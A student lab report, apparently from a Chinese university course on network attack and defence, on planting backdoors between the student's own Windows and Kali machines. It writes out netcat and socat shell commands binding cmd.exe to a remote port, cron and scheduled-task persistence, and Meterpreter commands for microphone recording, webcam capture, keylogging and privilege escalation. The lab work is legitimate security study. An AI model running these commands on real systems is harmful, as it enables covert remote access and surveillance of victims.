20212415 2023-2024-2 《网络与系统攻防技术》实验二实验报告

20212415李君健 2024-04-03 20:40:44

一、实验内容

本周主要学习了后门原理及免杀技术,并且进行了后门的相关实践。现在回答相关问题:

1.例举你能想到的一个后门进入到你系统中的可能方式?

后门可以通过常见的 Web 服务将目标连接到攻击者。后门会将目标网络内部的信息报告给攻击者,通过流行的Web服务(如Gmail,Windows Live Messenger或AJAX IM)通常使用的常见服务协议发送消息来植入后门到系统。

2.例举你知道的后门如何启动起来(win及linux)的方式?

对于系统的启动项后门,一种是重启电脑时自启动后门程序实现权限维持;另一种是点击某应用、服务、程序时自启动后门程序实现权限维持。因此攻击者可以在获得目标服务器权限后,随意启动后门。

3.Meterpreter有哪些给你映像深刻的功能?

首先了解什么是Meterpreter,它是Metasploit框架中的一个利器,作为漏洞溢出后的攻击载荷使用,攻击载荷在触发漏洞后会返回一个由攻击者控制的通道,可用于远程执行命令。我觉得印象最深的还是抓取相机设备、录音设备的功能,这直接地影响到了使用者的线下生活,而不仅仅停留在电脑、互联网层面。

4.如何发现自己有系统有没有被安装后门?

找可靠的杀毒软件,利用扫描防火墙进行查杀;或自主查看网络连接中有无可疑ip,有无可疑端口被打开。

二、实验过程

1.使用netcat获取主机操作Shell,cron启动某项任务

(1)先在win、linux两个系统下查看各自的ip地址,并且输入指令观察能否互相ping通,确认连通性良好。

img

img

img

img

(2)主机获取虚拟机的shell,在主机中进行监听,然后Linux反弹连接。
win主机端输入ncat.exe +主机ip +端口号
kali虚拟机端输入nc -l -p +端口号
两端便可以互发信息。

img

反弹式连接,使用Linux获取主机的shell。
win主机端输入ncat.exe -e cmd.exe +主机ip +端口号
kali虚拟机端输入nc -l -p +端口号
此时linux获取了主机的shell,可以执行命令。

img

同理,也可以实现Windows连接到Linux的shell。运行结果如下图所示。

img

(3)使用crontab指令来设置命令,修改最后一行的指令,使主机也可以监听Kali的shell。

img

img

2.使用socat获取主机操作Shell, 任务计划启动

(1)打开计算机管理,在任务计划程序中创建任务,并对触发器进行设置。操作设置为启动程序socat.exe,并添加参数tcp-listen:2415 exec:cmd.exe,pty,stderr,这个命令的作用是把cmd.exe绑定到端口2415,同时把cmd.exe的stderr重定向。

img

(2)启动新建任务,此时在kali中输入命令socat - tcp:主机ip:端口号,此时就能在Kali下获取到Windows的shell了。

img

3.使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell。

(1)使用msf创建后门程序。使用重定向将生成的后门程序从Kali传入到Windows下。

img

(2)进入监听模块,对攻击载荷进行设置,进行监听。

img

img

4.使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权。

(1)分别输入如下命令:
record_mic (进行录音)
webcam_snap(调取摄像头)
screenshot (截屏操作)
keyscan_start (开始记录主机键盘输入)
keyscan_dump (获取键盘输入的记录)

img

img

img

(2)使用getsystem提权。

img

5.使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell。

img

三、问题及解决方案

• 问题1:换wifi后win主机的IP地址会变
• 问题1解决方案:不绑定死ip。下次尽量在一个地方做实验。
• 问题2:Kali虚拟机执行程序时报错安全性问题
• 问题2解决方案:关闭kali虚拟机的防火墙

四、学习感悟、思考

本次实验还算有趣,内容和代码量上有些许繁琐,需要细致地执行监听、后门植入等各项操作。对以下内容有了较为深刻的理解:第一就是Windows主机和Linux虚拟机使用ncat和socat分别获取对方的Shell,从而达到监听或者是提升主机权限的目的;第二就是对于msf控制台的使用,包括监听的实现,各种操作的进行等等。

这次实验也提醒我不要乱下文件乱点链接,提高安全意识,不然极有可能被植入后门。

参考资料
(1)https://www.cnblogs.com/20001009fxy/p/16086530.html
(2)https://blog.csdn.net/2302_78587828/article/details/132780974 (kali关防火墙)

...全文
44 回复 打赏 收藏 转发到动态 举报
写回复
用AI写文章
回复
切换为时间正序
请发表友善的回复…
发表回复
基于云计算技术网络安全攻防实验平台设计与研究.pdf
基于云计算技术网络安全攻防实验平台设计与研究.pdf
开放实验网络攻防实验报告
网络攻防系列实验报告,包括克隆账号,利用肉鸡控制目标机,计算机病毒分析,木马攻击,ARP欺骗,漏洞攻击
网络安全工程师演示:安卓Android手机渗透测试与网络攻防技巧
课程目标: 掌握安卓Android手机渗透测试与网络攻防技巧 二、课程简介: 1、Kali Linux是基于Debian的Linux发行版操作系统,一开始是由Offensive Security的Mati Aharoni和Devon Kearns通过重写BackTrack来完成,...
网络攻防实验报告.rar
网络攻防实验报告.rar
网络攻防实验报告1
1.1 实验目的 1.2 实验环境 2.1 网络嗅探器总体设计 2.2 数据捕获模块的设计与实现 2.2.1 获得本地网络驱动器列表 2.2.2 打开网卡准备捕
2024网络与系统攻防技术

92

社区成员

408

社区内容

发帖
与我相关
我的任务
社区描述
网络攻防作业
网络安全 高校
社区管理员
  • blackwall0321
加入社区
  • 近7日
  • 近30日
  • 至今

加载中

查看更多榜单
社区公告
暂无公告

试试用AI创作助手写篇文章吧

+ 用AI写文章